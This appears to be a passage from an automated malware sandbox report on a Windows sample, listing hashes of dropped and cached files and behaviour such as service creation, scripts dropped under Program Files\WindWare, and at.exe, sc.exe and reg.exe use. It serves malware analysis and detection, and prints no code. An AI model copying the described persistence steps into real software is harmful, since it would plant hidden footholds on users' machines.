| SHA512 | 0a01779afed506d2e22267205863d23f8570de394704019d23cb1d8239fa1735d04976bc3cdcab301db33297cd6a2203afbc4238c1158edb044ba4a65a2db814 |
\??\PIPE\atsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2012-59-0x0000000000400000-0x0000000000423000-memory.dmp
memory/2012-61-0x0000000000400000-0x0000000000423000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabDE9F.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarDF4E.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fc9466c6ee07fbf9a333afbc342865f5 |
| SHA1 | 14e0568de769593700de32ee6f625da690984e03 |
| SHA256 | bce1e27a94fe2792fd8c8d3579b21277c6ff7ce33902a806d025b4a8691c3d7c |
| SHA512 | f83a347cefc8e2a512185a2ac90acfd373cac0da1884c4480eafafdca912f3378b46332bcdb650869abc440f953bff48201c47f2e16103d69df0844923cd866f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8c3039d4ca91ad6539e6c417080c946a |
| SHA1 | e584a378016067cce7147ce0a7cd9f2a8746a8e5 |
| SHA256 | e3cbe5ccd084b8e2eed448ac68d9b81c5e5745751417b62b5fca64a7c397ab86 |
| SHA512 | 7fc56e3a86e368e6b11eb0a0f26597d939c746c7ada2f844f0c976ac0edcb2a5e69f2fa8a8a4c09bb653416b24fa41af01db4024844fe2b16d85dc2f7448cc76 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 05528545593b57210df307f8fad9b268 |
| SHA1 | 5f00439f3447346713befa473c49f5df6db31744 |
| SHA256 | b652e78582396cfeb60afeda396820c40785929390658dd0a5bd9743d1204dfb |
| SHA512 | e3954b49ff55be8b96b563b0656fa3b11c1488fadccd276d23390e8c0b67280a7e487c1316d09e81137521ab3d25d5d00dd9cb00c6d32cad151e56656084abc9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8363d158d2ff406fb969c146c85054d0 |
| SHA1 | 47413e0097a6a8adeb59350b12aa1e34e1f7a594 |
| SHA256 | f2cbeaec2eaa462c44a27c9772454c07daa3cc697f8e02ae53c01440828afb22 |
| SHA512 | 7e49173151388643fba04ccc9b2971782f359d34639303c89314b3cc5346c8db1b948008d0512dd20bbc5b74f1f54378b4355d08894a274236dea11cd478d7e6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c492caee50665a8f251f7164ddfa683e |
| SHA1 | 3e5b237ce66517bac719f79599f2fd764c13028e |
| SHA256 | 4d6caa6244679f22c2af712ad1443d56217e0553d4bffdd4185b96ce5bd3e354 |
| SHA512 | bb1741ddb7523fd559b366b4814e81362d4bf86f1b1839dfa02d67ca327edf0b2f078f1a5fc2a611fdc5807d7388cf5630784218b60f450fa5d8039fff01e92c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b92dc6a80823e4657b0c4a0a30f08706 |
| SHA1 | 4b1ce1392f77f4a87c493ddfd1f56c51b53e5ccd |
| SHA256 | af64ab2e93ea9dd8bd6b710d86ce8b4fff65b44c8df5662cc2eb7495cdbf1966 |
| SHA512 | 5bc310516b10b2e06229f1eb9006c7e4b13e3b8f45041f8927696f18207b4119019f4242edb32aa25b2f03a2b17037c8c4cf415f40e34842242a92e1b77f3241 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 308965d8ecea502ff27a58bd2f10aeaf |
| SHA1 | ab36797df00e9bdbc45bed556120647a87dfce49 |
| SHA256 | 3dcf1e1b090d32792015c1333f7d9d0c419b36e291be01bc376a327acc22b82e |
| SHA512 | 4ffcc30a3033fb11b1ef9cfdd181f351cf27775cbd07bee392df4b5916b3a5ce4719b997b77aa973fdd183079903f7ec600bbf09cdc595bb4a78bae0a1328e2e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 24d4cb7519dbfed2a508cf1a1c4cee50 |
| SHA1 | 2e951f3c09a3614bf50c7241dab6a301dc2008a3 |
| SHA256 | cd5a73fb115bec75fe771fa8b27654ce4c90e8b8155f7b9c65b9feb924aaa38f |
| SHA512 | 47a597ecdb95da90a24ca7793e00f861d77ba5aab934ac8cc90e97a8e69f6bd451628f136e16ab3b89cb13780d919de62357696687f5bd7a8ca9f157432ce6b9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 710e408baa7bb98203d36eb8c65df180 |
| SHA1 | 1f84671207d6aae0705f8b647a350d83e61ecfbe |
| SHA256 | 9883674e980b8d80247fcf3d27c7693370dc5e00e09f8378213fbcaa28b0d93e |
| SHA512 | afd641a30bbde1c93f70993f2d26f470b9da72aed528019cbe55338394ba2593fe6b994ac00d2df443b89c67de24f671b3b5049b8558df3e6dc15ba7cdc1218a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bc2782dd8747cb7c173173a435525506 |
| SHA1 | d7e9d2701b6555820225257ee6537d4b4366ddf5 |
| SHA256 | 03258c09383a7c102fd08705cbe589eb8131de9d2699365b4a58ee9060d622bc |
| SHA512 | 6f0c5d01268dbcddd994b40870a8bc8489bf43143ef4fe5ca47b21c5b3e324284e3f9724bb258ef9846ef5e6f9789de3e302adb63a423d04286ee7cb7b22b2a3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ecd7816db93ade26995553ae17ec53e6 |
| SHA1 | ad41567edd5906d91f4fb60e781be03cf8cf3131 |
| SHA256 | 69c928d390bad80e271089665a326c9529d1ec339e81174e11ebaed7a1a0dbd2 |
| SHA512 | ece5f1d877e09bef9d709e8ab32912bbeb5632bac22c6806e13691366860f78188195a06bb01071f001ada001136129d476a8a5bbfe60b9179dde5d9ace3cd42 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9c89a1335f0746446c26f6e1df825364 |
| SHA1 | 05f45dc764ed44a4a54ea197d3544985799b46a1 |
| SHA256 | 8391c4e0d8e8e93425d50a102b64281403affee4fc7a183c13bc3ea4cf861395 |
| SHA512 | 0dddd4193a81df0e7878a1eae37c750c50f4db7e06238c7cadb946620f56816f657df0e8807b3c76ef6aec1aae99f807a374fbfbbbd9f1687d159d38a0f6fc6c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2241b33ba2aa8f0e2f8037e68d4734ba |
| SHA1 | 82ee5df496811414a161f44496c50c57b8693a37 |
| SHA256 | 0c7c7adf8c4704d867425bb0dc435138cc39bfc20481e9a6c4175d36d97e8755 |
| SHA512 | 418ecc875e6689a8dd1bc452de28fc31d8b4e07c9030e2dd841d2caedd6a3c57b60ebd8c7f2208877604947399faf29a074a21108190e01e14658441b943f1bb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9a25fdf245804d0a96b48acb071dc4eb |
| SHA1 | 240381751137911c2beb2281ed34f8a639457325 |
| SHA256 | 59697c06428e08329d9ec6e91023ecb48d981c76805a775075886bd6222f7c40 |
| SHA512 | 5dc42ea10f2423c60a3a1c8deb536cd41478fcc38c41dfa389cff2610419c84c39dcf291ad17642e38cf3dbf4b3f1a2d728d6889d8b37d224d0d81a19869e1da |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ac60cbaac8908736a2cd5fae174b5cca |
| SHA1 | 1fce69020f0ea5e9c83cce9d3eae4c96250c10bd |
| SHA256 | e2f74dda9978bbcbb715645ebe5641640be48806e2924789bd63d961af41d79a |
| SHA512 | 7cd350179e18cb1633d878c05ea3c85c30adf8be7d759144c1e474b77cd560533b69e7851a7083c784305f07ff9d328158adc396090613aefd195b9a894248ab |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 18fbdf13fa7fc2a05d85b58ae2376c76 |
| SHA1 | b5f5ffcebbaf27013bf59b2af04048b271efff44 |
| SHA256 | 58708443cacb264f2802fbdd2c2d76651f328bc8b688c7690fe7dea668f5f5fe |
| SHA512 | 0a57f928e90ead63670a22c14771ff35538ea7035fd71a273a4b47f8fa670bc7703e1ddcee2c4b9c3a1c01f8acbfe99128c87cebc7350c46ca6da2428657fb3f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-03 08:26
Reported
2024-11-03 08:29
Platform
win10v2004-20241007-en
Max time kernel
140s
Max time network
144s
Command Line
Signatures
Creates new service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\8a85523d1bf50ddd4544c874c2cfed4f_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WindWare\to.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindWare\to.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WindWare\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindWare\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WindWare\361.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindWare\361.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WindWare\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindWare\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Mail\UltraEdlt\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\Mail\UltraEdlt\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Windows\Mail\UltraEdlt\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\Mail\UltraEdlt\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\8a85523d1bf50ddd4544c874c2cfed4f_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
System Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437387383" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31141322" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{5EC30D5A-99BD-11EF-91C3-FA89EA07D49F} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "861373817" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31141322" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31141322" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "862310467" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000042e7dba96731da408b68fe0ed5b0a24600000000020000000000106600000001000020000000cd0e49af5e4b7cb2fdf44af49ae83c7bb26b2bca65598ecb21e5d8891d81aa7a000000000e80000000020000200000001879e43f16d449c226373ea590ce0d785f659793c3fa695e5460ca140774018f2000000048be4984d2fd7fc083c9ddcdd7c5b55a118ff6817dffbeca3cbc560ab2e05e7c400000006c0e06ca8e28dd9e8ba0ab112e931b1a57f0c24d7936ec3435e8b89710e190b17a06d941955ced689870cf4d8eec7ed7aa271acde70a6f3a90eb732292637e91 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b043cc33ca2ddb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "861373817" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31141322" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
